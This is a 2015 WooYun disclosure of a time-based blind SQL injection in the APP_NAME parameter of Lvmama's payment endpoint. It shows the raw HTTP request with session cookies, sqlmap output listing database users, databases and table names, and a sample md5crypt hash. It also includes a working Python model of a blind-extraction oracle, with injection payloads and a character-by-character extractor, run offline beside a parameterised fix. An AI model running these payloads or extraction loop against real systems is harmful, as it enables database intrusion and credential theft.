
Vulnerability Summary

Defect ID: wooyun-2015-0142911

Title: SQL injection on the Lvmama (驴妈妈旅游网) main site (DBA privileges / time-based blind / 7 databases affected)

Vendor: 驴妈妈旅游网 (Lvmama)

Author: Xmyth_Xi2oMin9

Submitted: 2015-09-23 09:13

Fixed: 2015-11-07 10:26

Published: 2015-11-07 10:26

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability Details

Disclosure status:

2015-09-23: Details sent to the vendor, awaiting vendor action
2015-09-23: Vendor confirmed; details visible to the vendor only
2015-10-03: Details disclosed to core white hats and domain experts
2015-10-13: Details disclosed to regular white hats
2015-10-23: Details disclosed to intern white hats
2015-11-07: Details disclosed to the public

Summary:

See title.

Details:

Test request (the `APP_NAME` parameter carries the injection; the response is inferred from timing only):

GET /payment/pay/geexOrder.do?callback=success_jsonp&TYPE=FRONT&APP_NAME=aaaaa&APP_START_DATE=&APP_END_DATE=&LOAN_DOWNPAY_MIN=&LOAN_DOWNPAY_MAX=&OPPT_ID=&_=1442927451066 HTTP/1.1
Host: pay.lvmama.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
Referer: http://www.lvmama.com/myspace/geex.do
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: uid=wKgKcFYBSTRiIi28AzMnAg==; lvsessionid=44abc08b-7275-498e-9ee7-395443b33064_15667285; CoreID6=37603654693514429248595&ci=90409730; vst_ebk_sessionid=f944f244-943d-49b5-a32f-e45f12ce0d3b; oUC=018115018115; oUT=08220822; CASTGC=TGC-56-fhisgT9f9AWdSkT5JywoNnSDyg1j8l60yQx3WL8TH0adoJ4YJe; unUserName=testaaaa; LSTA=781daaa8220ab30cd9fd0fd85ed6ae7b; EMV=U; UN=testaaaa%5E%21%5E4028b25b4fd5ada2014fdae694f60395; Hm_lvt_006c64491cb8acf2092ce0e0341797fe=1442926142; Hm_lpvt_006c64491cb8acf2092ce0e0341797fe=1442926142; _gscu_1059159971=42924981jf5s2210; _gscs_1059159971=42924981y2x3v110|pv:3; _gscbrs_1059159971=1; __xsptplus443=443.2.1442926066.1442926146.4%232%7Cwww.baidu.com%7C%7C%7C%7C%23%23jYwMqOfqxQhhqc_tXZ1w0zJmyc3najX9%23; __utma=30114658.550250882.1442926147.1442926147.1442926147.1; __utmb=30114658.31.10.1442926147; __utmc=30114658; __utmz=30114658.1442926147.1.1.utmcsr=login.lvmama.com|utmccn=(referral)|utmcmd=referral|utmcct=/nsso/null; bfd_s=30114658.38702051.1442924859756; tmc=43.30114658.99931619.1442924859758.1442927429127.1442927444549; tma=30114658.99931619.1442924859758.1442924859758.1442924859758.1; tmd=43.30114658.99931619.1442924859758.; bfd_g=b56c782bcb75035d0000354b00082c1e56014936; Hm_lvt_cb09ebb4692b521604e77f4bf0a61013=1442924860,1442924981,1442926072; Hm_lpvt_cb09ebb4692b521604e77f4bf0a61013=1442927446; 90409730_clogin=v=1&l=1442924859&e=1442929248795


[screenshot: 4.jpg]


Privileges (sqlmap output):

current user is DBA:    True


Users:

database management system users [4]:
[*] 'gravity'@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'::1'
[*] 'root'@'localhost'


Databases:

available databases [7]:
[*] fast_log
[*] geex
[*] gravity
[*] gravity_pre
[*] information_schema
[*] mysql
[*] performance_schema

Proof:

gravity:

[83 tables]
+------------------------+
| BIZ_APP01 |
| BIZ_APP01_FULL |
| BIZ_APP_CHECKLIST |
| BIZ_APP_COMMENTS |
| BIZ_APP_COMMON |
| BIZ_APP_COMMON_FULL |
| BIZ_APP_LOG |
| BIZ_APP_OPPT |
| BIZ_APP_ORDER |
| BIZ_APP_RECON_DTL |
| BIZ_APP_RECON_SUM |
| BIZ_APP_REJECT |
| BIZ_APP_STATUS |
| BIZ_APP_TRACK |
| BIZ_CAMPAIGN |
| BIZ_CANTACT_INFO |
| BIZ_DEVICE |
| BIZ_DFC_CONFIG |
| BIZ_FUNDER |
| BIZ_HAR_MERCHANT |
| BIZ_HAR_PDT |
| BIZ_HAR_REFUNDBANK |
| BIZ_HAR_REPAY |
| BIZ_HAR_REPAY2PDT |
| BIZ_HAR_REPAYPLAN |
| BIZ_HAR_SALES |
| BIZ_HAR_STORE |
| BIZ_HAR_STORE2PDT |
| BIZ_LOAN_PDT |
| BIZ_LOAN_PLAN |
| BIZ_MERCHANT |
| BIZ_PDT_SORT |
| BIZ_PREPAYMENT |
| BIZ_PREPAYMENT_ITEM |
| BIZ_RESOUCES |
| BIZ_RETAILS_PDT |
| BIZ_SHD_LIST |
| BIZ_STORE_ORGNZ |
| BIZ_TAGGING |
| BIZ_TAGS |
| BIZ_TRANSACTION_RECORD |
| BIZ_UNIPAY_RECORD |
| BIZ_V_APP_APL |
| BIZ_V_APP_BCF |
| BIZ_V_APP_BCF02 |
| BIZ_V_APP_BCF03 |
| BIZ_V_APP_BOC |
| BIZ_V_APP_BYR |
| BIZ_V_APP_GFC |
| BIZ_V_APP_HAR |
| BIZ_V_APP_QKE |
| CRM_ACTION_LOG |
| CRM_CONFIG |
| CRM_CONVERT |
| CRM_CRON_SCHEDULE |
| CRM_DICT |
| CRM_DICT2 |
| CRM_EMAIL_MGR |
| CRM_EMAIL_RAW |
| CRM_EMAIL_RAW_FULL |
| CRM_EMAIL_SENT |
| CRM_EMAIL_WORK |
| CRM_GAME_KV |
| CRM_RELATION |
| CRM_SMS_MGR |
| CRM_UNIQUEID_MGR |
| CRM_UPDOWN_MGR |
| CRM_USER_INFO_WECHAT |
| FRAUD_FACEPP_DETECTION |
| FRAUD_FACEPP_SIMSCORE |
| FRAUD_INSTINCT_INFO |
| FRAUD_INSTINCT_OUT |
| accounts |
| ci_sessions |
| dx_login_attempts |
| dx_permissions |
| dx_roles |
| dx_user_autologin |
| dx_user_profile |
| dx_user_temp |
| dx_users |
| migrations |
| pd_message |
+------------------------+


dx_users holds all the user records. Passwords are not stored in clear: they are md5crypt hashes (the `$1$` crypt(3) format), for example $1$.49TxKWL$0stw8KLcghDgaaASJrVHv1.
The other columns can still be pulled out character by character, but since this is time-based blind injection I did not go any further.
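The screens above are sqlmap output; what it automates is a one-bit-per-request timing oracle. The following is an added example, not code from the report or from lvmama.com, that models that oracle offline in Python: a handler that splices the parameter into SQL the way the vulnerable endpoint presumably does, the hardened handler beside it, and the character-by-character extraction the author stopped short of. It assumes `APP_NAME` is the injected parameter and that the server concatenates it into a `SELECT` (neither is shown in the report); the back end is an in-memory SQLite database with a `SLEEP()` user function registered in place of MySQL's, and the tables and rows are constructed for the demo.

```python
"""Time-based blind SQL injection modelled offline (added example, not the report's code).

Assumptions not stated in the report: APP_NAME is the injected parameter, the
handler builds its query by string concatenation, and the schema below. The
real target ran MySQL; SQLite is used here so the example runs with no network.
"""
import sqlite3
import time

DELAY = 0.1            # seconds; real attacks use several seconds to beat network jitter
THRESHOLD = DELAY / 2  # a response slower than this counts as "condition true"


def make_db():
    conn = sqlite3.connect(":memory:")
    # SQLite has no SLEEP(); register one so MySQL-style delay payloads behave the same.
    conn.create_function("SLEEP", 1, lambda s: time.sleep(s) or 0)
    conn.execute("CREATE TABLE BIZ_APP01 (APP_NAME TEXT)")
    conn.execute("INSERT INTO BIZ_APP01 VALUES ('real_app')")   # constructed row
    conn.execute("CREATE TABLE dx_users (username TEXT, password TEXT)")
    # constructed row; the hash is the md5crypt format quoted in the report
    conn.execute("INSERT INTO dx_users VALUES ('admin', '$1$.49TxKWL$0stw8KLcghDgaaASJrVHv1')")
    return conn


def geex_order_vulnerable(conn, app_name):
    """Vulnerable shape: user input spliced into the SQL text (assumed, not shown in the report)."""
    sql = "SELECT COUNT(*) FROM BIZ_APP01 WHERE APP_NAME = '" + app_name + "'"
    return conn.execute(sql).fetchone()[0]


def geex_order_fixed(conn, app_name):
    """Hardened shape: bound parameter, so input can never alter the query structure."""
    sql = "SELECT COUNT(*) FROM BIZ_APP01 WHERE APP_NAME = ?"
    return conn.execute(sql, (app_name,)).fetchone()[0]


def inject(condition):
    """APP_NAME value that sleeps iff condition holds.
    MySQL equivalent: aaaaa' OR IF(<condition>,SLEEP(n),0)-- """
    return "aaaaa' OR (CASE WHEN (%s) THEN SLEEP(%s) ELSE 0 END)-- " % (condition, DELAY)


def delayed(handler, conn, condition):
    """The oracle: read one bit from response latency."""
    t0 = time.monotonic()
    handler(conn, inject(condition))
    return time.monotonic() - t0 >= THRESHOLD


def extract(handler, conn, subquery, max_len=64):
    """Recover the string returned by subquery one character at a time, binary-searching
    the printable ASCII range (about 7 requests per character plus one length probe)."""
    out = ""
    for pos in range(1, max_len + 1):
        if not delayed(handler, conn, "LENGTH((%s)) >= %d" % (subquery, pos)):
            break                      # past the end of the string
        lo, hi = 32, 127               # character code is in [lo, hi]
        while lo < hi:
            mid = (lo + hi) // 2
            # MySQL equivalent: ASCII(SUBSTRING((...),pos,1)) > mid
            cond = "UNICODE(SUBSTR((%s),%d,1)) > %d" % (subquery, pos, mid)
            if delayed(handler, conn, cond):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


def run_demo():
    """Returns (string leaked through the vulnerable handler,
                whether the fixed handler still delays on the same payload)."""
    conn = make_db()
    leaked = extract(geex_order_vulnerable, conn, "SELECT username FROM dx_users LIMIT 1")
    still_delays = delayed(geex_order_fixed, conn, "1=1")
    return leaked, still_delays


if __name__ == "__main__":
    leaked, still_delays = run_demo()
    print("leaked via vulnerable handler:", leaked)
    print("fixed handler delays on the same payload:", still_delays)
```

Against the vulnerable handler the loop leaks `admin` in a few dozen requests; against the parameterised handler the payload is just a literal that matches nothing and the oracle never fires. On MySQL the same loop uses `IF(...,SLEEP(n),0)` and `ASCII(SUBSTRING(...))`, and the "current user is DBA" line in the report is sqlmap running this kind of probe against `mysql.user` privileges.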

Fix suggestion:

:-) Lvmama is a good vendor; if I dig up enough, its gifts will catch up with me.

Copyright: please credit Xmyth_Xi2oMin9@乌云 when reposting.


Vulnerability Response

Vendor response:

Severity: High

Rank: 20

Confirmed: 2015-09-23 10:24

Vendor reply:

Thanks!

Latest status:

None yet